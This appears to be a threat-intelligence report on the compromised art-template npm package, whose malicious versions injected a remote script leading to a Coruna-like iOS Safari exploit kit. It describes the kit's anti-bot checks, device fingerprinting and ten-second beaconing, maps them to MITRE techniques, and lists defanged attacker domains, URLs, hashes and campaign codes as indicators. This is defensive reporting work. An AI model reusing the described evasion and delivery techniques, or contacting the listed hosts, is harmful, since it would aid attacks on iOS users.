Coruna Respawned: Compromised art-template npm Package Leads to iOS Browser Exploit Kit

A compromised npm package, art-template, was used to inject a Coruna-like iOS exploit delivery framework through a watering-hole chain that redirected victims to utaq[.]cfww[.]shop and targeted Safari on iOS 11.0 through 17.2. The implant fingerprinted devices, beaconed victim IP and device version to l1ewsu3yjkqeroy[.]xyz, and used version-specific WebAssembly and architecture checks to route payloads such as cassowary and other Coruna-linked exploit chains. #art-template #Coruna #UNC6691 #utaqcfwwshop #l1ewsu3yjkqeroyxyz

Keypoints

The art-template npm package was compromised after maintenance was handed to an unknown actor.
Malicious versions 4.13.5 and 4.13.6 injected remote scripts into lib/template-web.js.
The delivery chain redirected victims from v3.jiathis[.]com to utaq[.]cfww[.]shop/gooll/gooll.html.
The payload targeted Safari/WebKit on iOS 11.0 through 17.2 and rejected other browsers and newer iOS versions.
The implant performed multiple anti-bot and anti-automation checks, including navigator.webdriver detection and MathML probing.
It beaconed public IP, device version, and a campaign code to l1ewsu3yjkqeroy[.]xyz every 10 seconds.
The framework used Coruna-style content-addressed module fetching and version-specific WebAssembly logic, with strong overlap to Coruna exploit kit chains and UNC6691 activity.

MITRE Techniques

[T1195.001] Supply Chain Compromise – The attacker abused a trusted npm package by taking over maintenance and publishing malicious versions (‘someone previously acquired the project under the guise of taking over its maintenance’).
[T1059.007] JavaScript – The malicious payload was delivered and executed as injected JavaScript in browser-side template code (‘injecting a plaintext loadScript() call’).
[T1105] Ingress Tool Transfer – The implant fetched remote modules and payloads from attacker-controlled infrastructure (‘fetch the server-side payload via a content-addressed remote module loader’).
[T1027] Obfuscated Files or Information – The code used UTF-16 packing, XOR arrays, and encoded constants to hide strings and values (‘per-string XOR encoding’ and ‘UTF-16 integer packer’).
[T1497.001] Virtualization/Sandbox Evasion: System Checks – The implant rejected headless or automated environments using webdriver, WebRTC/WebGL, MathML, and storage checks (‘unconditional block against all Selenium, Playwright, and Puppeteer-controlled browsers’).
[T1518] Software Discovery – The payload fingerprinted browser and OS versions to decide which module to load (‘parses version string into integer score’ and ‘version-specific payload modules’).
[T1041] Exfiltration Over C2 Channel – The implant sent victim IP and device version to a command-and-control endpoint (‘POST beacon to C2’ every 10 seconds).
[T1132.001] Data Encoding: Standard Encoding – The script encoded data and identifiers before transmission and module lookup (‘loadScript’, base64 constructor, and XOR-decoded strings).
[T1056.003] Input Capture: Web Portal Capture – The injected browser script could hijack forms and steal cookies/localStorage (‘cookie/localStorage theft, form hijacking, redirects’).
[T1499.001] Endpoint Denial of Service: Application Exhaustion Flood – The repeated beaconing and reload loop increased execution persistence and repeated client-side activity (‘setInterval(() => location.reload(), 60_000_000)’).

Indicators of Compromise

[Domains] Supply-chain injection and payload hosting – v3.jiathis[.]com, utaq[.]cfww[.]shop
[C2 Domain] Beacon destination – l1ewsu3yjkqeroy[.]xyz, and other related .xyz campaign infrastructure
[URLs] Injected and landing URLs – hxxps://v3.jiathis[.]com/code/jia.js?uid=artemplate, hxxps://utaq[.]cfww[.]shop/gooll/gooll.html
[URLs] Beacon and IP-oracle requests – hxxps://l1ewsu3yjkqeroy[.]xyz/api/ip-sync/sync, hxxps://ipv4[.]icanhazip[.]com
[File names] Entry point and self-registered name – 49554fde7424c31c.js, 7a7d99099b035b2c6512b6ebeeea6df1ede70fbb.min.js
[File hashes] Entry-point script hashes – SHA-256 f31bdd069fe7966ae11be1f78ee5dd44445938856dd1df12379e0e84a6851f5c, MD5 6e79ae622b7ef30f31fdbcc2dc65339e, and other hashes
[Campaign codes] Beacon identifiers – CHMK6IG08F42496C22, 1DECX7UIQIB43
[Remote module hashes] Version-specific module identifiers – e3b6ba10484875fabaed84076774a54b87752b8a, c03c6f666a04dd77cfe56cda4da77a131cbb8f1c, and 6beef463953ff422511395b79735ec990bed65f4
[Derived module paths] Content-addressed fetch paths – 5ff38f5342bb3c931bc504d6fa3523d0c8865b93.js, 46ecd515ac9e99ef0603063db39303a0fd849632.js

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print